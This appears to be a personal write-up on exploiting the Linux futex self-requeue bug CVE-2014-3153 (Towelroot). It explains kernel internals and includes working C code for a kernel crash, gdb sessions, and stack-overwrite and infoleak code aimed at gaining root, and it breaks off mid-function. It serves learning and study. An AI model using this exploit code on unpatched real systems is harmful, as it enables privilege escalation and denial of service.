Original text by Elon Gliksberg

# Understanding The Kernel

For quite some time now, I’ve been wanting to unveil the internals of modern operating systems.

I didn’t like how the most basic and fundamental level of a computer was so abstract to me,

and that I did not *truly* grasp how some of it works, a “black-box”.

I’ve always been more than familiar with kernel and OS concepts,

but there’s a big gap from comprehending them as a user versus a kernel hacker.**I wanted to see code, not words.**

In order to tackle that, I decided to take on a small kernel exploit challenge, and in parallel read Linux Kernel Development. Initially, the thought of reading the kernel’s code seemed a bit spooky, *“I wouldn’t understand a thing”*. Little by little, it wasn’t as intimidating, and honestly, it turned out to be quite easier than I expected.

Now, I feel tenfolds more comfortable to simply look something up in the source in order to understand how it works, rather than searching man pages endlessly or consulting other people.

# Kernel Exploitation

The book was really nice and all, but I wanted to get my hands dirty.

I searched for a disclosed vulnerability within the Linux kernel,

my plan being that I’d read its flat description and develop my own exploit to it.

A friend recommended CVE-2014-3153, also known as *Towelroot*, and I just went for it.

Back in the days, it was very commonly used in order to root Android devices.

# Fast Userspace Mutex

The vulnerability is based around a mechanism called *Futex* within the kernel.

Futex being a wordplay on *Fast userspace Mutex*.

The Linux kernel provides futexes as a building block for implementing userspace locking.

A Futex is identified by a piece of memory which can be shared between processes or threads. In its bare form, a Futex is a counter that can be incremented and decremented atomically and processes can wait for its value to become positive.

Futex operation occurs entirely in userspace for the noncontended case.

The kernel is involved only to arbitrate the contended case.

Lock contention is a state where a thread attempts to acquire a lock that is already held by another thread.

The futex() system call provides a method for waiting until a certain condition becomes true. It is typically used as a blocking construct in the context of shared-memory synchronization. When using futexes, the majority of the synchronization operations are performed in user space. A user- space program employs the futex() system call only when it is likely that the program has to block for a longer time until the condition becomes true. Other futex() operations can be used to wake any processes or threads waiting for a particular condition.

I will cover **only** the terms and concepts related to the exploitation.

For a more profound insight about futexes, please reference man futex(2) and man futex(7).

I strongly suggest messing around with the examples in order to assess your understanding.

The

Due to the blocking nature of

you’d notice how there’s a lot of dealing with threads within the exploit which can get slightly confusing unless approached slowly.

There are two core concepts to understand about futexes in general which we’d talk a lot about.

The first is something’s called a *waiters list*, also known as the *wait queue*.

This term refers to the blocking threads that are currently waiting for a lock to be released.

It is held in kernelspace and programs can issue syscalls to carry out operations on it. For instance, attempting to lock a contended lock would result in an insertion of a waiter, releasing a lock would pop a waiter from the list and reschedule its task.

The second is that there are two kinds of futexes: PI & non-PI.

PI stands for Priority Inheritance.

Priority inheritance is a mechanism for dealing with the priority-inversion problem. With this mechanism, when a high- priority task becomes blocked by a lock held by a low-priority task, the priority of the low-priority task is temporarily raised to that of the high-priority task, so that it is not preempted by any intermediate level tasks, and can thus make progress toward releasing the lock.

This introduces the ability to prioritize waiters among the futex’s waiters list.

A higher-priority task is guaranteed to get the lock faster than a lower-priority task.

Unlike non-PI operations, for instance.

FUTEX_WAKE

This operation wakes at most val of the waiters that are waiting (e.g., inside FUTEX_WAIT) on the futex word at the address uaddr. Most commonly, val is specified as either 1 (wake up a single waiter) or INT_MAX (wake up all waiters). No guarantee is provided about which waiters are awoken (e.g., a waiter with a higher scheduling priority isnot guaranteedto be awoken in preference to a waiter with a lower priority).

Both non-PI and PI futex types are used within the exploit.

The way PI futexes are implemented is using what’s called in the kernel a *plist*, a priority-sorted list.

If you don’t know what it is, you could take a look here, though this image sums it up perfectly.

All images are copied from Appdome.

# Bug & Vulnerability

Here’s the CVE description.

The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.

Let’s break it down.

First, we need to understand what’s a requeue operation in the context of futexes.

A waiter, blocking thread, that is contending on a lock, can be “requeued” by a running thread to be told to wait on a different lock instead of the one that it currently waits on.

A waiter on a non-PI futex can be requeued to either a different non-PI futex, or to a PI-futex.

A waiter on a PI-futex cannot be requeued.

The bug itself is that there are **no validations whatsoever on requeuing from a futex to itself**.

This allows us to requeue a PI-futex waiter to itself, which clearly violates the following policy.

FUTEX_CMP_REQUEUE_PI

Requeues waiters that are blocked via FUTEX_WAIT_REQUEUE_PI on uaddr from anon-PI sourcefutex (uaddr) to aPI targetfutex (uaddr2).

Take a look at the bug fix commit, both the description and the code changes.

Though, what actually happens when you requeue a waiter to itself? Good question.

Before actually diving into the exploit, I decided to provide a rough overview of how it works for context further on. Eventually, what this bug gives us is a **dangling waiter** within the futex’s waiters list. The way the exploit does that is as follows:

Step | Operation | Description |

1. |
FUTEX_LOCK_PI | Lock a PI futex. |

2. |
FUTEX_WAIT_REQUEUE_PI | Wait on a non-PI futex, with the intention of being requeued to the PI futex. |

3. |
FUTEX_CMP_REQUEUE_PI | Requeue the non-PI futex waiter onto the PI futex. |

4. | Userspace Overwrite | Set the PI futex’s value to
0 |

5. |
FUTEX_CMP_REQUEUE_PI | Requeue the PI futex waiter to itself. |

And now we’ll understand why this results in a dangling waiter.

There are a lot of different data types within the Futex’s implementation code,

in order to cope with that I made somewhat of a summary of them to help me keep track of what’s going on. Feel free to use it as needed.

**Step 1**

We start off by locking the PI-futex. We do that because we want the first requeue (step 3) to block and create a waiter on the waiters list, rather than acquire the lock immediately. That waiter is destined to be our dangling waiter later on in the exploit.

**Step 2**

In order to requeue a waiter from a non-PI –> PI futex, we first have to invoke

What this function does is take a non-PI futex and wait (

*potentially*be requeued to with a

<strong>static</strong> <strong>int</strong> <strong>futex_wait_requeue_pi</strong>(u32 __user <strong>*</strong>uaddr, <strong>unsigned</strong> <strong>int</strong> flags,

u32 val, ktime_t <strong>*</strong>abs_time, u32 bitset,

u32 __user <strong>*</strong>uaddr2)

{

<strong>struct</strong> hrtimer_sleeper timeout, <strong>*</strong>to <strong>=</strong> NULL;

<strong>struct</strong> rt_mutex_waiter rt_waiter; <em>// <-- Important</em>

<strong>struct</strong> rt_mutex <strong>*</strong>pi_mutex <strong>=</strong> NULL;

<strong>struct</strong> futex_hash_bucket <strong>*</strong>hb;

<strong>union</strong> futex_key key2 <strong>=</strong> FUTEX_KEY_INIT;

<strong>struct</strong> futex_q q <strong>=</strong> futex_q_init;

<strong>int</strong> res, ret;

...

The function defines various local variables, the most important of which is the

Unsurprisingly, this variable is our waiter.

<strong>struct</strong> rt_mutex_waiter {

<strong>struct</strong> plist_node list_entry;

<strong>struct</strong> plist_node pi_list_entry;

<strong>struct</strong> task_struct <strong>*</strong>task;

<strong>struct</strong> rt_mutex <strong>*</strong>lock;

};

It contains the

Needless to say that the locals are placed on the kernel stack, but also worth mentioning that because it’ll be crucial to understand in the near future.

Later on, it initializes the futex queue entry and enqueues it.

q.bitset <strong>=</strong> bitset;

q.rt_waiter <strong>=</strong> <strong>&</strong>rt_waiter;

q.requeue_pi_key <strong>=</strong> <strong>&</strong>key2;

...

<em>/* Queue the futex_q, drop the hb lock, wait for wakeup. */</em>

futex_wait_queue_me(hb, <strong>&</strong>q, to);

Note how it sets the

This is part of what allows us to self-requeue. We’ll see this in the final step.

At this point in the code, the function simply blocks and does not continue unless:

- A wakeup occurs.
- The process is killed.

**Step 3**

**vulnerable**and most important function in the exploit. The function is fairly long and therefore I’m not going to review all of its logic, and rather only address the relevant parts.

I do encourage you to brief over it and try to get a hold of what it does.

<strong>static</strong> <strong>int</strong> <strong>futex_requeue</strong>(u32 __user <strong>*</strong>uaddr1, <strong>unsigned</strong> <strong>int</strong> flags,

u32 __user <strong>*</strong>uaddr2, <strong>int</strong> nr_wake, <strong>int</strong> nr_requeue,

u32 <strong>*</strong>cmpval, <strong>int</strong> requeue_pi)

{

...

<strong>if</strong> (requeue_pi <strong>&&</strong> (task_count <strong>-</strong> nr_wake <strong><</strong> nr_requeue)) {

ret <strong>=</strong> futex_proxy_trylock_atomic(uaddr2, hb1, hb2, <strong>&</strong>key1,

<strong>&</strong>key2, <strong>&</strong>pi_state, nr_requeue);

<em>/*

* Lock is already acquired due to our call to FUTEX_LOCK_PI in step 1.

* Therefore the acquisition fails and 0 is returned.

* We will revisit futex_proxy_trylock_atomic below.

*/</em>

...

head1 <strong>=</strong> <strong>&</strong>hb1<strong>-></strong>chain;

plist_for_each_entry_safe(this, next, head1, list) {

...

<strong>if</strong> (requeue_pi) {

atomic_inc(<strong>&</strong>pi_state<strong>-></strong>refcount);

this<strong>-></strong>pi_state <strong>=</strong> pi_state;

ret <strong>=</strong> rt_mutex_start_proxy_lock(<strong>&</strong>pi_state<strong>-></strong>pi_mutex,

this<strong>-></strong>rt_waiter,

this<strong>-></strong>task, 1);

<em>/*

* this->rt_waiter points to the local variable rt_waiter

* in the futex_wait_requeue_pi from step 2.

* It is now added as a waiter on the new lock.

*/</em>

...

}

Let’s quickly glance at the code that requeues the waiter at

..<strong>int</strong> <strong>rt_mutex_start_proxy_lock</strong>(<strong>struct</strong> rt_mutex <strong>*</strong>lock,

<strong>struct</strong> rt_mutex_waiter <strong>*</strong>waiter,

<strong>struct</strong> task_struct <strong>*</strong>task, <strong>int</strong> detect_deadlock)

{

<strong>int</strong> ret;

raw_spin_lock(<strong>&</strong>lock<strong>-></strong>wait_lock);

<em>// Attempt to take the lock. Fails because lock is taken.</em>

<strong>if</strong> (try_to_take_rt_mutex(lock, task, NULL)) {

raw_spin_unlock(<strong>&</strong>lock<strong>-></strong>wait_lock);

<strong>return</strong> 1;

}

ret <strong>=</strong> task_blocks_on_rt_mutex(lock, waiter, task, detect_deadlock);

...

<strong>static</strong> <strong>int</strong> <strong>task_blocks_on_rt_mutex</strong>(<strong>struct</strong> rt_mutex <strong>*</strong>lock,

<strong>struct</strong> rt_mutex_waiter <strong>*</strong>waiter,

<strong>struct</strong> task_struct <strong>*</strong>task,

<strong>int</strong> detect_deadlock)

{

<strong>struct</strong> task_struct <strong>*</strong>owner <strong>=</strong> rt_mutex_owner(lock);

<strong>struct</strong> rt_mutex_waiter <strong>*</strong>top_waiter <strong>=</strong> waiter;

<strong>unsigned</strong> <strong>long</strong> flags;

<strong>int</strong> chain_walk <strong>=</strong> 0, res;

...

<em>// Set the waiter's task and rt_mutex members.</em>

waiter<strong>-></strong>task <strong>=</strong> task;

waiter<strong>-></strong>lock <strong>=</strong> lock;

<em>// Initialize the waiter's list entries.</em>

plist_node_init(<strong>&</strong>waiter<strong>-></strong>list_entry, task<strong>-></strong>prio);

plist_node_init(<strong>&</strong>waiter<strong>-></strong>pi_list_entry, task<strong>-></strong>prio);

<em>/* Get the top priority waiter on the lock */</em>

<strong>if</strong> (rt_mutex_has_waiters(lock))

top_waiter <strong>=</strong> rt_mutex_top_waiter(lock);

<em>// Add the waiter to the waiters list.</em>

plist_add(<strong>&</strong>waiter<strong>-></strong>list_entry, <strong>&</strong>lock<strong>-></strong>wait_list);

...

Now,

**Step 4**

Here we’ll set the userspace value of the futex, also known as the futex-word, to

This is vital so that when the self-requeuing occurs, the call to

It might seem confusing at first but it’ll clear up in the next step.

**Step 5**

On this step, we’ll requeue the PI futex waiter to itself and invoke

once again.this time.<strong>if</strong> (requeue_pi <strong>&&</strong> (task_count <strong>-</strong> nr_wake <strong><</strong> nr_requeue)) {

<em>/*

* Attempt to acquire uaddr2 and wake the top waiter. If we

* intend to requeue waiters, force setting the FUTEX_WAITERS

* bit. We force this here where we are able to easily handle

* faults rather in the requeue loop below.

*/</em>

ret <strong>=</strong> futex_proxy_trylock_atomic(uaddr2, hb1, hb2, <strong>&</strong>key1,

<strong>&</strong>key2, <strong>&</strong>pi_state, nr_requeue);

...

<em>/*

* Return:

* 0 - failed to acquire the lock atomically;

* 1 - acquired the lock;

* <0 - error

*/</em>

<strong>static</strong> <strong>int</strong> <strong>futex_proxy_trylock_atomic</strong>(u32 __user <strong>*</strong>pifutex,

<strong>struct</strong> futex_hash_bucket <strong>*</strong>hb1,

<strong>struct</strong> futex_hash_bucket <strong>*</strong>hb2,

<strong>union</strong> futex_key <strong>*</strong>key1, <strong>union</strong> futex_key <strong>*</strong>key2,

<strong>struct</strong> futex_pi_state <strong>**</strong>ps, <strong>int</strong> set_waiters)

{

<strong>struct</strong> futex_q <strong>*</strong>top_waiter <strong>=</strong> NULL;

u32 curval;

<strong>int</strong> ret;

...

top_waiter <strong>=</strong> futex_top_waiter(hb1, key1);

<em>/* There are no waiters, nothing for us to do. */</em>

<strong>if</strong> (<strong>!</strong>top_waiter)

<strong>return</strong> 0;

<em>/* Ensure we requeue to the expected futex. */</em>

<strong>if</strong> (<strong>!</strong>match_futex(top_waiter<strong>-></strong>requeue_pi_key, key2))

<strong>return</strong> <strong>-</strong>EINVAL;

<em>/*

* Try to take the lock for top_waiter. Set the FUTEX_WAITERS bit in

* the contended case or if set_waiters is 1. The pi_state is returned

* in ps in contended cases.

*/</em>

ret <strong>=</strong> futex_lock_pi_atomic(pifutex, hb2, key2, ps, top_waiter<strong>-></strong>task,

set_waiters);

<strong>if</strong> (ret <strong>==</strong> 1)

requeue_pi_wake_futex(top_waiter, key2, hb2);

<strong>return</strong> ret;

}

Pay attention to how it ensures that the

**self-requeue**, and why it

*wouldn’t*be sufficient to just set the value of a different futex in userspace to

So the requirements for triggering the bug are:

- The target futex from the
remains.futex_wait_requeue_pi()
- There’s a waiter that is actively contending on the source futex.

The only scenario that meets both these terms is a self-requeue.

Other than that, basically all it does is call

and if the lock was acquired,wake up the top waiter of the source futex.

<strong>static</strong> <strong>int</strong> <strong>futex_lock_pi_atomic</strong>(u32 __user <strong>*</strong>uaddr, <strong>struct</strong> futex_hash_bucket <strong>*</strong>hb,

<strong>union</strong> futex_key <strong>*</strong>key,

<strong>struct</strong> futex_pi_state <strong>**</strong>ps,

<strong>struct</strong> task_struct <strong>*</strong>task, <strong>int</strong> set_waiters)

{

<strong>int</strong> lock_taken, ret, force_take <strong>=</strong> 0;

u32 uval, newval, curval, vpid <strong>=</strong> task_pid_vnr(task);

retry:

ret <strong>=</strong> lock_taken <strong>=</strong> 0;

<em>/*

* To avoid races, we attempt to take the lock here again

* (by doing a 0 -> TID atomic cmpxchg), while holding all

* the locks. It will most likely not succeed.

*/</em>

newval <strong>=</strong> vpid;

<strong>if</strong> (set_waiters)

newval <strong>|=</strong> FUTEX_WAITERS;

<strong>if</strong> (unlikely(cmpxchg_futex_value_locked(<strong>&</strong>curval, uaddr, 0, newval)))

<strong>return</strong> <strong>-</strong>EFAULT;

...

<em>/*

* Surprise - we got the lock. Just return to userspace:

*/</em>

<strong>if</strong> (unlikely(<strong>!</strong>curval))

<strong>return</strong> 1;

...

The function attempts to atomically compare-and-exchange the futex-word. It compares it to

This operation is

*was able*to get the lock.

Recalling the function above, if we successfully took control of the lock, we’d wake the top waiter, which is the waiter that was added to the waiters list on the first requeue (step 3).

Because we overwrote the value in userspace (step 4), the function **succeeds and wakes the waiter**.

wakes up the waiter, it sets theret <strong>=</strong> futex_lock_pi_atomic(pifutex, hb2, key2, ps, top_waiter<strong>-></strong>task,

set_waiters);

<strong>if</strong> (ret <strong>==</strong> 1)

requeue_pi_wake_futex(top_waiter, key2, hb2);

.<strong>static</strong> <strong>inline</strong>

<strong>void</strong> <strong>requeue_pi_wake_futex</strong>(<strong>struct</strong> futex_q <strong>*</strong>q, <strong>union</strong> futex_key <strong>*</strong>key,

<strong>struct</strong> futex_hash_bucket <strong>*</strong>hb)

{

get_futex_key_refs(key);

q<strong>-></strong>key <strong>=</strong> <strong>*</strong>key;

__unqueue_futex(q);

WARN_ON(<strong>!</strong>q<strong>-></strong>rt_waiter);

q<strong>-></strong>rt_waiter <strong>=</strong> NULL; <em>// Right here.</em>

q<strong>-></strong>lock_ptr <strong>=</strong> <strong>&</strong>hb<strong>-></strong>lock;

<em>// Start scheduling the task again.</em>

wake_up_state(q<strong>-></strong>task, TASK_NORMAL);

}

is<em>/* Check if the requeue code acquired the second futex for us. */</em>

<strong>if</strong> (<strong>!</strong>q.rt_waiter) {

<em>/*

* Got the lock. We might not be the anticipated owner if we

* did a lock-steal - fix up the PI-state in that case.

*/</em>

...

} <strong>else</strong> {

<em>/*

* We have been woken up by futex_unlock_pi(), a timeout, or a

* signal. futex_unlock_pi() will not destroy the lock_ptr nor

* the pi_state.

*/</em>

...

<em>// Removes the waiter from the wait_list.</em>

ret <strong>=</strong> rt_mutex_finish_proxy_lock(pi_mutex, to, <strong>&</strong>rt_waiter, 1);

...

<em>/* Unqueue and drop the lock. */</em>

unqueue_me_pi(<strong>&</strong>q);

}

*not*being called since

#### Recap

We start off by locking a PI-futex. Then we simply requeue a thread to it which creates a waiter entry on the futex’s waiters list. Afterwards, we overwrite the futex-word with

This leaves us with a dangling waiter on the waiters list whose thread has continued and is up and running. Now, the waiter entry points to garbage kernel stack memory. The original

Our waiter, a node in the waiters list, is now completely corrupted.

# Building The Kernel

I won’t go too in depth as to how I built the kernel, since there are a milion of tutorials out there on how to do that. I’d merely state that I’ve been using an 3.11.4-i386 kernel for this exploit that I compiled on a Xenial (Ubuntu 16.04) Docker container.

The only actual hassle was getting my hands on the right

It would be virtually impossible to do all of that without building your own kernel.

The ability to debug the code and add your own logs within the code is indescribable.

For actually running the kernel, I’ve used QEMU as my emulator.

# Exploitation

Now’s the time for the actual fun.

Eventually, our goal would be to escalate to

The way we’d do that is by achieving arbitrary read & write within the kernel’s memory, and then overwrite our process’

<strong>struct</strong> cred {

atomic_t usage;

kuid_t uid; <em>/* real UID of the task */</em>

kgid_t gid; <em>/* real GID of the task */</em>

kuid_t suid; <em>/* saved UID of the task */</em>

kgid_t sgid; <em>/* saved GID of the task */</em>

kuid_t euid; <em>/* effective UID of the task */</em>

kgid_t egid; <em>/* effective GID of the task */</em>

kuid_t fsuid; <em>/* UID for VFS ops */</em>

kgid_t fsgid; <em>/* GID for VFS ops */</em>

<strong>unsigned</strong> securebits; <em>/* SUID-less security management */</em>

kernel_cap_t cap_inheritable; <em>/* caps our children can inherit */</em>

kernel_cap_t cap_permitted; <em>/* caps we're permitted */</em>

kernel_cap_t cap_effective; <em>/* caps we can actually use */</em>

kernel_cap_t cap_bset; <em>/* capability bounding set */</em>

kernel_cap_t cap_ambient; <em>/* Ambient capability set */</em>

...

}

The most fundamental members of

Although how would we go about it by solely having a wild reference to that waiter?

Quite frankly, the idea is fairly simple. There’s nothing new about corrupting a node within a linked list in order to gain read and write capabilities. Same applies here. We’d need to find a way to write to that dangling waiter, and then perform certain operations on it so that the kernel would do as we please.

#### Kernel Crash

But let’s start small. For now we’ll just attempt to crash the kernel.

I wrote a program that implements the steps that we listed above.

Let’s analyze it before going into the actual exploitation. Here’s the code.

<strong>#define CRASH_SEC 3

</strong>

<strong>int</strong> <strong>main</strong>()

{

pid_t pid;

<strong>uint32_t</strong> <strong>*</strong>futexes;

<strong>uint32_t</strong> <strong>*</strong>non_pi_futex, <strong>*</strong>pi_futex;

assert((futexes <strong>=</strong> mmap(NULL, <strong>sizeof</strong>(<strong>uint32_t</strong>) <strong>*</strong> 2, PROT_READ <strong>|</strong> PROT_WRITE, MAP_ANONYMOUS <strong>|</strong> MAP_SHARED, <strong>-</strong>1, 0)) <strong>></strong> 0);

non_pi_futex <strong>=</strong> <strong>&</strong>futexes[0];

pi_futex <strong>=</strong> <strong>&</strong>futexes[1];

flock(pi_futex);

assert((pid <strong>=</strong> fork()) <strong>!=</strong> <strong>-</strong>1);

<strong>if</strong> (<strong>!</strong>pid)

{

fwait_requeue(non_pi_futex, pi_futex, 0);

puts("Child continues.");

exit(EXIT_SUCCESS);

}

printf("Kernel will crash in %u seconds...\n", CRASH_SEC);

sleep(CRASH_SEC);

frequeue(non_pi_futex, pi_futex, 1, 0);

<strong>*</strong>pi_futex <strong>=</strong> 0;

frequeue(pi_futex, pi_futex, 1, 0);

wait(NULL);

}

The

futexes <strong>=</strong> mmap(NULL, <strong>sizeof</strong>(<strong>uint32_t</strong>) <strong>*</strong> 2, PROT_READ <strong>|</strong> PROT_WRITE, MAP_ANONYMOUS <strong>|</strong> MAP_SHARED, <strong>-</strong>1, 0)

We start off by allocating

Mind the

*Side-comment*: In the actual exploit you’d see that I’m using

- Locking the
.pi_futexflock(pi_futex)
- Spawn a child process and call
fromFUTEX_WAIT_REQUEUE_PItonon_pi_futex.pi_futexassert((pid <strong>=</strong> fork()) <strong>!=</strong> <strong>-</strong>1); <strong>if</strong> (<strong>!</strong>pid) { fwait_requeue(non_pi_futex, pi_futex, 0); puts("Child continues."); exit(EXIT_SUCCESS); }
- We only
to assure that thesleepof the child process had already been issued. Afterwards, we requeue the waiter to thefwait_requeue.pi_futexsleep(CRASH_SEC); frequeue(non_pi_futex, pi_futex, 1, 0);
- Overwrite the userspace value of the
topi_futex.0<strong>*</strong>pi_futex <strong>=</strong> 0;
- Self-requeue.
frequeue(pi_futex, pi_futex, 1, 0);

Now let’s see this in action.

If you paid attention to the call trace, you would spot that the kernel crashes once the process itself terminates (

To be more accurate, it occurs here.

<strong>static</strong> <strong>inline</strong> <strong>struct</strong> rt_mutex_waiter <strong>*</strong>

<strong>rt_mutex_top_waiter</strong>(<strong>struct</strong> rt_mutex <strong>*</strong>lock)

{

<strong>struct</strong> rt_mutex_waiter <strong>*</strong>w;

w <strong>=</strong> plist_first_entry(<strong>&</strong>lock<strong>-></strong>wait_list, <strong>struct</strong> rt_mutex_waiter,

list_entry);

BUG_ON(w<strong>-></strong>lock <strong>!=</strong> lock); <em>// <-- KERNEL BUG</em>

<strong>return</strong> w;

}

The function compares the lock that the top waiter claims it waits on to the actual lock. Because the waiter is completely bugged, it’s

# Privilege Escalation

DOSing the system is pretty cool, but let’s make it more interesting by escalating to

I intetionally do not post the entire exploit in advance because that would most likely be too overwhelming. Instead, I’ll append code blocks by stages.

If you do prefer to have the entire exploit available in hand, it can be found here.

#### Writing To The Waiter

In order to make use of our dangling waiter, we’d first need to find a way to write to it.

A quick reminder, our waiter is placed on the kernel stack. With that in mind, we need to somehow be able to write a controlled buffer to the place the waiter was held within the stack. Given that we’re just a userspace program, our way of writing data to the kernel’s stack is by issuing System Calls.

But how do we know which syscall to invoke?

Luckily for us, the kernel comes with a useful tool called

It can be found within the source under

$ objdump -d vmlinux | ./scripts/checkstack.pl i386 | grep -E "(futex_wait_requeue_pi|sys)"

0xc11206e6 do_sys_poll [vmlinux]: 932

0xc1120aa3 do_sys_poll [vmlinux]: 932

...

0xc1527388 ___sys_sendmsg [vmlinux]: 248

0xc15274d8 ___sys_sendmsg [vmlinux]: 248

0xc1527b1a ___sys_recvmsg [vmlinux]: 220

0xc1527c6b ___sys_recvmsg [vmlinux]: 220

0xc1087936 futex_wait_requeue_pi.constprop.21 [vmlinux]:212

0xc1087a80 futex_wait_requeue_pi.constprop.21 [vmlinux]:212

0xc1529828 __sys_sendmmsg [vmlinux]: 184

0xc15298fe __sys_sendmmsg [vmlinux]: 184

...

The script lists the stack depth, size of stack frame, of each function within the kernel. This would help us in estimating which syscall we should use in order to write to the waiter’s address space.

We enforce two limitations on the system call we’re looking for.

- It is deep enough in order to overlap with our dangling
.rt_waiter
- The local variable within the function that overlaps
is controllable.rt_waiter

The syscalls

That should be a good place to start. We’ll be using

andBreakpoint 1, futex_wait_requeue_pi (uaddr=uaddr@entry=0x80ff44c, flags=flags@entry=0x1, val=val@entry=0x0,

abs_time=abs_time@entry=0x0, uaddr2=uaddr2@entry=0x80ff450, bitset=0xffffffff) at kernel/futex.c:2285

(gdb) set $waiter = &rt_waiter

Breakpoint 2, ___sys_sendmsg (sock=sock@entry=0xc5dfea80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cbef4,

flags=flags@entry=0x0, used_address=used_address@entry=0xc78cbf10) at net/socket.c:1979

(gdb) p $waiter

$12 = (struct rt_mutex_waiter *) 0xc78cbe2c

(gdb) p &iovstack

$11 = (struct iovec (*)[8]) 0xc78cbe08

(gdb) p sizeof(iovstack)

$13 = 0x40

(gdb) p &iovstack < $waiter < (char*)&iovstack + sizeof(iovstack)

$14 = 0x1 (True)

Variable | Address |

rt_waiter |
0xc78cbe2c |

iovstack |
0xc78cbe08 0xc78cbe48 |

Proved

Let’s take a look at

<strong>int</strong> <strong>sendmmsg</strong>(<strong>int</strong> sockfd, <strong>struct</strong> mmsghdr <strong>*</strong>msgvec, <strong>unsigned</strong> <strong>int</strong> vlen,

<strong>int</strong> flags);

<strong>struct</strong> mmsghdr

{

<strong>struct</strong> msghdr msg_hdr;

<strong>unsigned</strong> <strong>int</strong> msg_len;

};

<strong>struct</strong> msghdr

{

<strong>void</strong> <strong>*</strong>msg_name;

socklen_t msg_namelen;

<strong>struct</strong> iovec <strong>*</strong>msg_iov; <em>// <-- iovstack</em>

<strong>size_t</strong> msg_iovlen;

<strong>void</strong> <strong>*</strong>msg_control;

<strong>size_t</strong> msg_controllen;

<strong>int</strong> msg_flags;

};

<strong>struct</strong> iovec

{

<strong>void</strong> <strong>*</strong>iov_base;

<strong>size_t</strong> iov_len;

};

At this point I suggest understanding the syscall itself.

The sendmmsg() system call is an extension of sendmsg(2) that allows the caller to transmit multiple messages on a socket using a single system call. (This has performance benefits for some applications.)

The arguments are pretty trivial and essentially the same as

If you’re unfamiliar with the syscall, give it a read at

In order to invoke

**block**so that we can take advantage of the waiter’s corrupted state while it’s under our control.

Typically, the function sends the data over the socket and exits. In order to make it block, we’d need to use

*reliable connection-based*byte stream. This grants us the blocking capabilities we’ve talked about. On top of that, we’d need to fill up the “send buffer” so that data can’t be sent over the socket, unless data is read on the other end.

I’ve crafted a function that does just that.

<strong>#define BLOCKBUF "AAAAAAAA"

#define BLOCKBUFLEN strlen(BLOCKBUF)

</strong>

<strong>int</strong> client_sockfd, server_sockfd;

<strong>void</strong> <strong>setup_sockets</strong>()

{

<strong>int</strong> fds[2];

puts(USERLOG "Creating a pair of sockets for kernel stack modification using blocking I/O.");

assert(<strong>!</strong>socketpair(AF_UNIX, SOCK_STREAM, 0, fds));

client_sockfd <strong>=</strong> fds[0];

server_sockfd <strong>=</strong> fds[1];

<strong>while</strong> (send(client_sockfd, BLOCKBUF, BLOCKBUFLEN, MSG_DONTWAIT) <strong>!=</strong> <strong>-</strong>1)

;

assert(errno <strong>==</strong> EWOULDBLOCK);

}

The function creates a pair of UNIX sockets of type

MSG_DONTWAIT

Enables nonblocking operation; if the operation would block, EAGAIN or EWOULDBLOCK is returned.

Afterwards we assert that

Next up, we’re ready for actually invoking our

For the sake of overwriting the waiter’s list entries properly, which is what we’re interested in, we’d need to align the

<strong>#define COUNT_OF(arr) (sizeof(arr) / sizeof(arr[0]))

</strong>

<strong>struct</strong> mmsghdr msgvec;

<strong>struct</strong> iovec msg[7];

<strong>void</strong> <strong>setup_msgs</strong>()

{

<strong>int</strong> i;

<strong>for</strong> (i <strong>=</strong> 0; i <strong><</strong> COUNT_OF(msg); i<strong>++</strong>)

{

msg[i].iov_base <strong>=</strong> 0x41414141;

msg[i].iov_len <strong>=</strong> 0xace;

}

msgvec.msg_hdr.msg_iov <strong>=</strong> msg;

msgvec.msg_hdr.msg_iovlen <strong>=</strong> COUNT_OF(msg);

}

In this function I setup the messages, the

Breakpoint 1, futex_wait_requeue_pi (uaddr=uaddr@entry=0x80ff44c, flags=flags@entry=0x1, val=val@entry=0x0,

abs_time=abs_time@entry=0x0, uaddr2=uaddr2@entry=0x80ff450, bitset=0xffffffff) at kernel/futex.c:2285

(gdb) set $waiter = &rt_waiter

(gdb) cont

Continuing.

Breakpoint 3, ___sys_sendmsg (sock=sock@entry=0xc5dfda80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cfef4,

flags=flags@entry=0x0, used_address=used_address@entry=0xc78cff10) at net/socket.c:1979

(gdb) fin

Run till exit from #0 ___sys_sendmsg (sock=sock@entry=0xc5dfda80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cfef4,

flags=flags@entry=0x0, used_address=used_address@entry=0xc78cff10) at net/socket.c:1979

^C

Program received signal SIGINT, Interrupt.

(gdb) p *$waiter

$26 = {

list_entry = {

prio = 0xace,

prio_list = {

next = 0x41414141,

prev = 0xace

},

node_list = {

next = 0x41414141,

prev = 0xace

}

...

}

There are many interesting things to look at from this experiment. Let’s go over it.

Just as before, I store

(In reality there’s only a single waiter)

That’s great! We can now overwrite the dangling waiter’s memory.

Let’s review this as a whole within the the exploit code.

<strong>void</strong> <strong>*</strong><strong>forge_waiter</strong>(<strong>void</strong> <strong>*</strong>arg)

{

puts(USERLOG "Placing the fake waiter on the dangling node within the mutex's waiters list.");

setup_msgs();

setup_sockets();

assert(<strong>!</strong>fwait_requeue(<strong>&</strong>non_pi_futex, <strong>&</strong>pi_futex, 0));

assert(<strong>!</strong>sendmmsg(client_sockfd, <strong>&</strong>msgvec, 1, 0));

}

<strong>int</strong> <strong>main</strong>()

{

pthread_t forger, ref_holder;

lock_pi_futex(NULL);

assert(<strong>!</strong>pthread_create(<strong>&</strong>forger, NULL, forge_waiter, NULL));

sleep(1);

assert(frequeue(<strong>&</strong>non_pi_futex, <strong>&</strong>pi_futex, 1, 0) <strong>==</strong> 1);

assert(<strong>!</strong>pthread_create(<strong>&</strong>ref_holder, NULL, lock_pi_futex, NULL));

sleep(1);

pi_futex <strong>=</strong> 0;

frequeue(<strong>&</strong>pi_futex, <strong>&</strong>pi_futex, 1, 0);

...

}

We’ve already reviewed

You could see that I create another thread called

# Kernel Infoleak

Our next goal would be to leak an address that would help us target the

of our process which contains itsThe way we go about doing it is using a fake waiter and when we’d attempt to lock the futex once again, another waiter would be added to the waiters list which would result in writing to the adjacent nodes which would be under our control. Once that happens, we’d be able to inspect the kernel address from userspace via the fake waiter list nodes.

<strong>#define DEFAULT_PRIO 120

#define THREAD_INFO_BASE 0xffffe000

</strong>

<strong>struct</strong> rt_mutex_waiter fake_waiter, leaker_waiter;

pthread_t corrupter;

<strong>void</strong> <strong>link_fake_leaker_waiters</strong>()

{

